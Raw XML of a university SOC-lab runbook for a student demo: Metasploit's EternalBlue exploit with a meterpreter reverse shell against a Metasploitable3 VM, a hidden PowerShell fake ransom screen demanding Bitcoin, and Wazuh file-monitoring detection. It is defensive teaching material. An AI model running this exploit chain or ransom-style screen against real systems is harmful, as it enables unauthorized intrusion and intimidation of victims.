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C0392B"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>SOC Lab — Ransomware Demo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F8C8D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Miami University Senior Design | Attack Chain Runbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="400"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Kali: 172.17.0.223   |   Target (Metasploitable3 Win): 172.26.1.13   |   SIEM (Wazuh): VM 110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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>This runbook is for use ONLY on the isolated Proxmox SOC lab. Never run these commands against unauthorized systems.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Overview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This runbook documents the full attack chain for the senior design SOC demo. The attack originates from Kali Linux, exploits EternalBlue (MS17-010) on the Metasploitable3 Windows target, and delivers a fullscreen ransomware simulation. Wazuh detects and alerts on the file activity.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Prerequisites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3182"/>
        <w:gridCol w:w="3180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31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Kali VM (108)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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172.17.0.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Attacker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Metasploitable3 Win (115)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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172.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30.0.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Victim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Wazuh SIEM (110)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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172.26.1.x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Detection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Both VMs powered on and reachable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Metasploit Framework installed on Kali (pre-installed)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Wazuh agent running on victim VM with FIM enabled</w:t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Step 1 — Verify Target is Reachable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Run this from Kali to confirm port 445 (SMB) is open on the target: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nmap -sV 172.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30.0.229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Expected: Port 445 open, Windows Server 2008 R2 / 2012 reported.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Step 2 — Launch Metasploit and Exploit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Open msfconsole on Kali and run the following commands in order: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msfconsole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color w:val="FFFF00"/>
              </w:rPr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use exploit/windows/smb/ms17_010_eternalblue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 xml:space="preserve">set RHOSTS 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172.30.0.229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set LHOST 172.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30.0.195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set PAYLOAD windows/x64/meterpreter/reverse_tcp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run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Wait for the meterpreter prompt. May take 10-20 seconds. If it fails, run the 'run' command again — EternalBlue occasionally needs a retry.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2"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="856404"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Do not proceed until you see 'meterpreter &gt;' in the console.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Step 3 — Deploy Ransomware Screen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Once you have the meterpreter shell, past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clear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e this entire command. It runs PowerShell remotely on the victim — no file upload needed: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execute -f powershell.exe -a '-WindowStyle Hidden -Command "Add-Type -AssemblyName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System.Windows.Forms; Add-Type -AssemblyName System.Drawing; $f = New-Object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System.Windows.Forms.Form; $f.WindowState = \"Maximized\"; $f.BackColor = \"Black\";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$f.TopMost = $true; $f.BringToFront(); $f.Activate(); $f.FormBorderStyle = \"None\";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$title = New-Object System.Windows.Forms.Label;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$title.Text = \"YOUR FILES HAVE BEEN ENCRYPTED\";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$title.ForeColor = \"Red\";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$title.Font = New-Object System.Drawing.Font(\"Courier New\", 24,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[System.Drawing.FontStyle]::Bold); $title.AutoSize = $true;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$title.Location = New-Object System.Drawing.Point(100,100);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$skull = New-Object System.Windows.Forms.Label;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$skull.Text = \"SEND 0.5 BTC TO RECEIVE YOUR FILES BACK\";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$skull.ForeColor = \"White\";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$skull.Font = New-Object System.Drawing.Font(\"Courier New\", 14);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$skull.AutoSize = $true; $skull.Location = New-Object System.Drawing.Point(100,180);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$timerLabel = New-Object System.Windows.Forms.Label;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$timerLabel.ForeColor = \"Orange\";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$timerLabel.Font = New-Object System.Drawing.Font(\"Courier New\", 36,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[System.Drawing.FontStyle]::Bold); $timerLabel.AutoSize = $true;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$timerLabel.Location = New-Object System.Drawing.Point(100,250);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$demo = New-Object System.Windows.Forms.Label;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$demo.Text = \"[DEMO - Miami University SOC Lab]\";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$demo.ForeColor = \"Gray\";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$demo.Font = New-Object System.Drawing.Font(\"Courier New\", 10);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$demo.AutoSize = $true; $demo.Location = New-Object System.Drawing.Point(100,360);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$end = (Get-Date).AddHours(72); $t = New-Object System.Windows.Forms.Timer;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$t.Interval = 1000; $t.Add_Tick({ $remaining = $end - (Get-Date);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$timerLabel.Text = \"{0:D2}:{1:D2}:{2:D2}\" -f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$remaining.Hours,$remaining.Minutes,$remaining.Seconds }); $t.Start();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$f.Controls.AddRange(@($title,$skull,$timerLabel,$demo)); $f.ShowDialog()"'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victim VM will immediately show a fullscreen black screen with red encrypted message and orange countdown timer.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Step 4 — Show Wazuh Alerts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Open the Wazuh dashboard and show the alerts firing from the victim VM. For best results, ensure FIM is configured on the victim with this entry in ossec.conf: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&lt;directories realtime="yes" report_changes="yes"&gt;C:\RansomDemo&lt;/directories&gt;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Cleanup — Killing Processes After Demo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In meterpreter, list running processes and kill the PowerShell instances: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ps</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:before="20" w:after="20"/>
              <w:rPr>
                <w:color w:val="FFFF0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FFFF00"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>kill &lt;PID&gt;   # kill each powershell.exe PID shown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To fully reset, revert the Metasploitable3 VM to a snapshot in Proxmox.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C0392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>Troubleshooting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5359"/>
      </w:tblGrid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EternalBlue fails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Run 'run' again — usually works on 2nd try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Meterpreter drops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Re-run the exploit, re-paste the PowerShell command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Screen not showing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Check Proxmox console for VM 115 directly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Old processes still running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Run 'ps' in meterpreter and kill powershell.exe PIDs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 445 not open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Confirm VM 115 is powered on in Proxmox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top w:val="single" w:sz="4" w:space="1" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Miami University Cybersecurity SOC Lab — Senior Design Demo Runbook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LibreOffice/24.2.7.2$Linux_X86_64 LibreOffice_project/420$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>3</Pages>
  <Words>572</Words>
  <Characters>3985</Characters>
  <CharactersWithSpaces>4484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2026-04-19T04:49:00Z</dcterms:created>
  <dc:creator>Un-named</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-23T19:01:32Z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